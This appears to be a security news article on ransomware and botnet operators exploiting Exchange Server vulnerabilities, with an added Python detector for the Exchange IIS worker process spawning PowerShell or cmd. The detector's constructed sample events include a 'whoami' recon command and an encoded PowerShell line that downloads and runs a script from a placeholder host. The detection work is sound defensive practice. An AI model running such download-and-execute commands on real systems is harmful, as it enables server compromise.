More Ransomware Gangs Targeting Vulnerable Exchange Servers

The Black Kingdom/Pydomer ransomware operators have joined the ranks of threat actors targeting the Exchange Server vulnerabilities that Microsoft disclosed in early March.

The four zero-day bugs were being exploited in live attacks well before patches were released for them on March 2, and far more adversaries have picked them up over the past three weeks, despite the additional mitigations Microsoft has made available for servers that cannot be patched immediately.

The number of unpatched Exchange installations has dropped significantly, going from roughly 80,000 on March 14 to fewer than 30,000 on March 22.

“As of today, we have seen a significant decrease in the number of still-vulnerable servers – more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities,” Microsoft noted in a March 25 blog post.

The number of attacks targeting the still-vulnerable servers, however, hasn’t diminished. In fact, the tech company reveals that additional ransomware families and botnets are now attempting to compromise the vulnerable servers.

DoejoCrypt, also known as DearCry, was the first ransomware family to target the Exchange vulnerabilities, more than two weeks ago. The Black Kingdom/Pydomer ransomware has since joined the fray, Microsoft says.

Known to target publicly disclosed vulnerabilities, including Pulse Secure VPN flaws, the Pydomer operators were observed mass-scanning for unpatched Exchange servers and attempting to compromise them.

“They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available,” the tech giant reveals.

The web shell dropped by the gang was observed on approximately 1,500 servers, but the ransomware was not deployed on all of them. On the rest, the adversaries are likely to try to monetize the unauthorized access in some other way, Microsoft says.

On systems where the ransomware was deployed, the attackers adopted a “non-encryption extortion strategy”: rather than encrypting files, they only dropped a ransom note informing victims of their demands.

“The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data,” the tech company points out.

Another adversary that has joined in over the past few weeks is the group behind the Lemon Duck cryptocurrency-mining botnet, which in some attacks used “a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process)” and other exploitation styles in the rest.

“While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner,” Microsoft explains.
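Both Lemon Duck's “direct PowerShell commands from w3wp” variant and the web-shell variant used by the other gangs share one telemetry signature: the IIS worker process that hosts Exchange (w3wp.exe) becomes the parent of a command interpreter, which it has no business doing in normal operation. The following detection logic is an added example, not code from Microsoft or SecurityWeek. It assumes process-creation records shaped like Sysmon Event ID 1 fields (ParentImage, ParentCommandLine, Image, CommandLine), that Exchange's IIS application pools are named MSExchange*AppPool as they are on a default install, and that PowerShell's -EncodedCommand payloads are base64 of UTF-16LE; the sample events are constructed for the example, not real logs.

```python
"""Flag the Exchange IIS worker process (w3wp.exe) spawning a command
interpreter: the pattern behind "direct PowerShell commands from w3wp"
and behind command execution through a web shell.

Added example, not Microsoft's or SecurityWeek's code. Assumes records
shaped like Sysmon Event ID 1 (ProcessCreate) fields; SAMPLE_EVENTS
below are constructed, not real telemetry."""
import base64
import re

PARENT = "w3wp.exe"
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# IIS starts worker processes as: w3wp.exe -ap "<AppPoolName>" -v "v4.0" ...
# On a default install, Exchange's own pools are all named MSExchange*AppPool.
APP_POOL_RE = re.compile(r'-ap\s+"?([^"\s]+)', re.I)
# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a base64 UTF-16LE script.
ENC_RE = re.compile(r"[-/]e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def app_pool(parent_cmdline):
    """Application pool name from a w3wp.exe command line, or None."""
    m = APP_POOL_RE.search(parent_cmdline)
    return m.group(1) if m else None


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Return one finding per interpreter whose parent is w3wp.exe."""
    findings = []
    for ev in events:
        if basename(ev.get("ParentImage", "")) != PARENT:
            continue
        child = basename(ev.get("Image", ""))
        if child not in INTERPRETERS:
            continue
        pool = app_pool(ev.get("ParentCommandLine", ""))
        cmdline = ev.get("CommandLine", "")
        findings.append({
            "child": child,
            "app_pool": pool,
            "exchange_pool": bool(pool) and pool.lower().startswith("msexchange"),
            "cmdline": cmdline,
            "decoded": decode_encoded_command(cmdline),
        })
    return findings


def _enc(script):
    """Constructed helper: encode a script the way -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # Scheduled task running PowerShell: parent is not w3wp, ignored.
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "ParentCommandLine": "svchost.exe -k netsvcs -p -s Schedule",
        "Image": PS,
        "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1",
    },
    {   # Web shell in the ECP app pool running a recon command.
        "ParentImage": W3WP,
        "ParentCommandLine": f'{W3WP} -ap "MSExchangeECPAppPool" -v "v4.0" -l "webengine4.dll"',
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c whoami",
    },
    {   # Fileless: OWA app pool launching an encoded PowerShell downloader.
        "ParentImage": W3WP,
        "ParentCommandLine": f'{W3WP} -ap "MSExchangeOWAAppPool" -v "v4.0" -l "webengine4.dll"',
        "Image": PS,
        "CommandLine": "powershell.exe -NoP -W Hidden -Enc "
                       + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    },
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        pool_kind = "EXCHANGE" if f["exchange_pool"] else "OTHER"
        print(f"[{pool_kind} pool {f['app_pool']}] w3wp.exe -> {f['child']}: "
              f"{f['decoded'] or f['cmdline']}")
```

The app pool name is what makes a hit triageable: a child of MSExchangeOWAAppPool or MSExchangeECPAppPool maps directly to the web-facing paths these gangs abuse, while a hit from an unrelated pool points at a different application on the same IIS host. Decoding the -EncodedCommand argument matters because the encoded form defeats keyword matching on the raw command line. Treat any w3wp-to-interpreter event on an Exchange server as worth a look even after patching, since, as the article notes, access obtained before the patch can outlive it.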

The company also underlines that attacks targeting Exchange servers may continue to affect organizations even after patches have been applied, through credentials stolen or persistence established while the servers were still vulnerable.

“Attackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates,” Microsoft concludes.

Related: Microsoft Defender Antivirus Now Protects Users Against Ongoing Exchange Attacks

Related: Microsoft Shares Additional Mitigations for Exchange Server Vulnerabilities Under Attack

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
